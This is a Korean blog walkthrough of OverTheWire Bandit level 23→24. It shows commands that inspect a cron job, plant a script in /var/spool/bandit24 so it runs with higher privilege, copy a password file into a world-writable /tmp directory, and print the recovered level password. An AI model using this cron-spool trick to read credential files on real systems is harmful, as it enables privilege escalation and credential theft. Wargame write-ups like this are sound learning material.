티스토리 뷰
Level Goal
다음 레벨로 넘어가는데 필요한 패스워드는 /etc/cron.d/에서 정보를 획득해서 확인할 수 있다.
$ cd /etc/cron.d/
$ cat cronjob_bandit24
$ cat /usr/bin/cronjob_bandit24.sh
cronjob_bandit24.sh을 보면 /var/spool/bandit24에 있는 스크립트를 실행하고 제거하는 것을 알 수 있고 이를 이용해서 다음 레벨의 패스워드를 획득할 수 있다.
$ mkdir -p /tmp/do9dark/
$ cd /tmp/do9dark/
$ cat > dump.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/do9dark/bandit_pass
(Ctrl+D)
$ chmod 777 dump.sh
$ chmod 777 /tmp/do9dark/
$ cp dump.sh /var/spool/bandit24/
$ cat bandit_pass
bandit24:UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
'Wargame > OverTheWire' 카테고리의 다른 글
| [Bandit] Level 26 (0) | 2016.02.02 |
|---|---|
| [Bandit] Level 25 (0) | 2016.02.02 |
| [Bandit] Level 24 (0) | 2016.02.02 |
| [Bandit] Level 22 (0) | 2016.02.02 |
| [Bandit] Level 21 (0) | 2016.02.02 |
| [Bandit] Level 20 (0) | 2016.02.02 |
| [Bandit] Level 19 (0) | 2016.02.02 |
| [Bandit] Level 18 (0) | 2016.02.02 |
| [Bandit] Level 17 (0) | 2016.02.02 |
| [Bandit] Level 16 (0) | 2016.02.02 |
댓글